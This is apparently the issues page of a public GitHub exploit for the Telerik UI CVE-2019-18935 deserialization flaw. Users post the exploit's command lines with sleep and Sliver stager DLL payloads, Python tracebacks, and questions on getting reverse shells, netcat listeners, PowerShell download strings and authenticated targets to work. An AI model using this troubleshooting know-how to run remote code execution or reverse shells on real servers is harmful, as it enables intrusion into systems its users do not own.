noperator / cve-2019-18935
RCE exploit for a .NET JSON deserialization vulnerability in Telerik UI for ASP.NET AJAX.
License: Apache License 2.0
Line 17 in 785c19b
Traceback (most recent call last):
File "C:\Users\hi\Desktop\CVE-2019-18935\CVE-2019-18935.py", line 202, in <module>
filename_remote_actual = upload(
File "C:\Users\hi\Desktop\CVE-2019-18935\CVE-2019-18935.py", line 121, in upload
if filename_remote != result['metaData']['TempFileName']:
TypeError: 'NoneType' object is not subscriptable
I have managed to compile the payload, and have shortlisted the version of Telerik to be 2019.1.215 (based on the last modified date on /WebResource). What could be the possible reason for this error?
The command I ran was:
python .\CVE-2019-18935.py -v 2019.1.215 -u HOSTNAME/Telerik.Web.UI.WebResource.axd?type=rau -p .\payloads\sleep-2020122117174156-amd64.dll -f 'C:\Windows\Temp'
Hi, I have tried all of the code for several days, but even the stager does not work. I installed Sliver in Kali, but the sliver-stager code also doesn't work. I enabled debug in the sliver-stager code and set it to 1, but it doesn't show any error, and sleep also doesn't increase the response time.
I tested these:
python3 CVE-2019-18935.py -v 2013.2.717.40 -p sleep-05202102280267-amd64.dll -u http://xxx/Telerik.Web.UI.WebResource.axd?type=rau
python3 CVE-2019-18935.py -v 2017 -u http://xxx/Telerik.Web.UI.WebResource.axd?type=rau -p sliver-stager-05202117080198-x86.dll and reverse shell
Please help.
Whenever I'm trying to get a rev shell, the connection is closed.
requests.exceptions.ConnectionError: ('Connection aborted.', ConnectionResetError(104, 'Connection reset by peer'))
Any suggestions on how to resolve the issue?
Thanks for this project. The target server has a Telerik vulnerability. The sleep.dll file is executing successfully, but when I want to get a reverse shell, the server pings but my netcat listener ends. nc: getnameinfo: Temporary failure in name resolution
Could it be some kind of WAF in the background? Or what is the reason for this? Can I use a different payload instead of the reverse_shell.c file? I think maybe I can succeed with the PowerShell download string method, but please give me an idea how I can do this.
I want to use this vulnerability in one of my tests.
The sleep tool works properly, but no reverse shell.
Where can the problem be?
Do you have a link/instructions where I can download Telerik for ASP.NET Ajax old versions and verify that the exploit works?
[*] Destination folder: C:\Windows\Temp
[*] Remote payload name: 1653504358.1273334.dll
Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 665, in urlopen
httplib_response = self._make_request(
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 387, in _make_request
conn.request(method, url, **httplib_request_kw)
File "/usr/lib/python3.10/http/client.py", line 1282, in request
self._send_request(method, url, body, headers, encode_chunked)
File "/usr/lib/python3.10/http/client.py", line 1328, in _send_request
self.endheaders(body, encode_chunked=encode_chunked)
File "/usr/lib/python3.10/http/client.py", line 1277, in endheaders
self._send_output(message_body, encode_chunked=encode_chunked)
File "/usr/lib/python3.10/http/client.py", line 1076, in _send_output
self.send(chunk)
File "/usr/lib/python3.10/http/client.py", line 998, in send
self.sock.sendall(data)
ConnectionResetError: [Errno 104] Connection reset by peer
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/requests/adapters.py", line 439, in send
resp = conn.urlopen(
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 719, in urlopen
retries = retries.increment(
File "/usr/lib/python3/dist-packages/urllib3/util/retry.py", line 400, in increment
raise six.reraise(type(error), error, _stacktrace)
File "/usr/lib/python3/dist-packages/six.py", line 718, in reraise
raise value.with_traceback(tb)
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 665, in urlopen
httplib_response = self._make_request(
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 387, in _make_request
conn.request(method, url, **httplib_request_kw)
File "/usr/lib/python3.10/http/client.py", line 1282, in request
self._send_request(method, url, body, headers, encode_chunked)
File "/usr/lib/python3.10/http/client.py", line 1328, in _send_request
self.endheaders(body, encode_chunked=encode_chunked)
File "/usr/lib/python3.10/http/client.py", line 1277, in endheaders
self._send_output(message_body, encode_chunked=encode_chunked)
File "/usr/lib/python3.10/http/client.py", line 1076, in _send_output
self.send(chunk)
File "/usr/lib/python3.10/http/client.py", line 998, in send
self.sock.sendall(data)
urllib3.exceptions.ProtocolError: ('Connection aborted.', ConnectionResetError(104, 'Connection reset by peer'))
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/root/misctest/RAU_crypto/CVE-2019-18935/CVE-2019-18935.py", line 245, in <module>
filename_remote_actual = upload(
File "/root/misctest/RAU_crypto/CVE-2019-18935/CVE-2019-18935.py", line 125, in upload
result = send_request(url, files)
File "/root/misctest/RAU_crypto/CVE-2019-18935/CVE-2019-18935.py", line 46, in send_request
response = post(url, files=files, headers=headers, verify=False)
File "/usr/lib/python3/dist-packages/requests/api.py", line 116, in post
return request('post', url, data=data, json=json, **kwargs)
File "/usr/lib/python3/dist-packages/requests/api.py", line 60, in request
return session.request(method=method, url=url, **kwargs)
File "/usr/lib/python3/dist-packages/requests/sessions.py", line 533, in request
resp = self.send(prep, **send_kwargs)
File "/usr/lib/python3/dist-packages/requests/sessions.py", line 646, in send
r = adapter.send(request, **kwargs)
File "/usr/lib/python3/dist-packages/requests/adapters.py", line 498, in send
raise ConnectionError(err, request=request)
requests.exceptions.ConnectionError: ('Connection aborted.', ConnectionResetError(104, 'Connection reset by peer'))
Getting this error while uploading the sleep payload. @noperator, as I see, you have closed issue #8, which didn't have much info.
Any wonder what's happening here?
To compile the DLL payload successfully, the .NET Framework 4.x SDK seems to be required. For example, the .NET Framework 4.6.1 SDK is available at https://www.microsoft.com/en-us/download/details.aspx?id=49978. It would be nice to have this info in the README.md.
Hello, do you know what this error means?
Validation of viewstate MAC failed. If this application is hosted by a Web Farm or cluster, ensure that <machineKey> configuration specifies the same validationKey and validation algorithm. AutoGenerate cannot be used in a cluster.
See http://go.microsoft.com/fwlink/?LinkID=314055 for more information
This tool works great when you can access 'Telerik.Web.UI.WebResource.axd?type=rau' as an unauthenticated user. But in most of the cases, I have seen that to access 'Telerik.Web.UI.WebResource.axd?type=rau' you need to be authenticated.
How to use this exploit in the authenticated case?
One possibility I can think of is to relay the tool's traffic via Burp using the proxy switch. Having a proxy switch would be really helpful in this case. Alternatively, we can also have a switch to provide session cookies to the tool.